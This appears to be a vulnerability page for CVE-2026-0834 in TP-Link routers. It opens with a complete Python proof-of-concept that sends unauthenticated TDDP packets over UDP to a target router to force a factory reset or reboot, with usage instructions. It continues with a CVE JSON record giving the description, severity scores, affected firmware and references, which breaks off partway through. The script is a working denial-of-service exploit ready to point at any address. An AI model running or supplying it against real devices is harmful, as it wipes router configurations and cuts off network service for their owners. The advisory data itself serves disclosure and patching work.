CVE-2026-0834

#!/usr/bin/env python3 """ CVE-2026-0834 PoC - TP-Link TDDP Logic Vulnerability Note: This PoC is for educational and authorized testing purposes only. """ import socket import struct import sys def create_tddp_packet(command_type, command_code, payload=b''): """ Create a TDDP protocol packet TDDP Header structure: - Version (1 byte): 0x01 - Type (1 byte): command_type - Code (1 byte): command_code - Length (2 bytes): packet length """ version = 0x01 packet = struct.pack('>BBBH', version, command_type, command_code, len(payload) + 8) packet += payload return packet def trigger_factory_reset(target_ip, target_port=20002): """ Trigger factory reset via TDDP protocol Type 0x09 = Command request Code 0x01 = Factory reset """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) # Construct factory reset command payload = b'\x00\x01' # Factory reset command packet = create_tddp_packet(0x09, 0x01, payload) print(f"[*] Sending factory reset packet to {target_ip}:{target_port}") sock.sendto(packet, (target_ip, target_port)) try: response, addr = sock.recvfrom(1024) print(f"[+] Received response from {addr}: {response.hex()}") except socket.timeout: print("[*] No response received (device may have restarted)") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False def trigger_reboot(target_ip, target_port=20002): """ Trigger device reboot via TDDP protocol Type 0x09 = Command request Code 0x02 = Reboot """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) # Construct reboot command payload = b'\x00\x02' # Reboot command packet = create_tddp_packet(0x09, 0x02, payload) print(f"[*] Sending reboot packet to {target_ip}:{target_port}") sock.sendto(packet, (target_ip, target_port)) try: response, addr = sock.recvfrom(1024) print(f"[+] Received response from {addr}: {response.hex()}") except socket.timeout: print("[*] No response received (device may have restarted)") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_ip> <action>") print("Actions: factory_reset, reboot") print(f"Example: {sys.argv[0]} 192.168.0.1 factory_reset") sys.exit(1) target = sys.argv[1] action = sys.argv[2].lower() if action == "factory_reset": trigger_factory_reset(target) elif action == "reboot": trigger_reboot(target) else: print("[-] Invalid action. Use 'factory_reset' or 'reboot'")

{"cve": {"id": "CVE-2026-0834", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-01-21T18:16:24.773", "lastModified": "2026-04-28T19:36:28.123", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Logic vulnerability in TP-Link Archer C20 v5, 6.0, Archer AX53 v1.0 and TL-WR841N v13 (TDDP module) allows unauthenticated adjacent attackers to execute administrative commands including factory reset and device reboot without credentials. Attackers on the adjacent network can remotely trigger factory resets and reboots without credentials, causing configuration loss and interruption of device availability.\n\nThis issue affects Archer C20 v6.0 < V6_251031, Archer C20 v5 <EU_V5_260317 or < US_V5_260419\n\n\nArcher AX53 v1.0 < \n\nV1_251215\n\n\n\nTL-WR841N v13 < 0.9.1 Build 20231120 Rel.62366"}, {"lang": "es", "value": "Vulnerabilidad lógica en TP-Link Archer C20 v6.0 y Archer AX53 v1.0 (módulo TDDP) permite a atacantes adyacentes no autenticados ejecutar comandos administrativos incluyendo restablecimiento de fábrica y reinicio del dispositivo sin credenciales. Atacantes en la red adyacente pueden activar de forma remota restablecimientos de fábrica y reinicios sin credenciales, causando pérdida de configuración e interrupción de la disponibilidad del dispositivo. Este problema afecta a Archer C20 v6.0 &lt; V6_251031.\n\nArcher AX53 v1.0 &lt; V1_251215"}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_ax53_firmware:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8C762E60-933C-4B61-84D1-0A6FE4D5E08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_ax53:-:*:*:*:*:*:*:*", "matchCriteriaId": "394AAF99-8784-4872-8EED-A12B97C575E4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_c20_firmware:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "E36B6485-1C16-4FC9-B5ED-3B0D5FC9B16B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_c20:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FFFAF05-D4CE-454A-B830-7899CAFC8ED0"}]}]}], "references": [{"url": "https://mattg.systems/posts/cve-2026-0834/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Permissions Required"]}, {"url": "https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/en/support/download/archer-c20/v5/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630"}, {"url": "https://www.tp-link.com/en/support/download/ ... (truncated)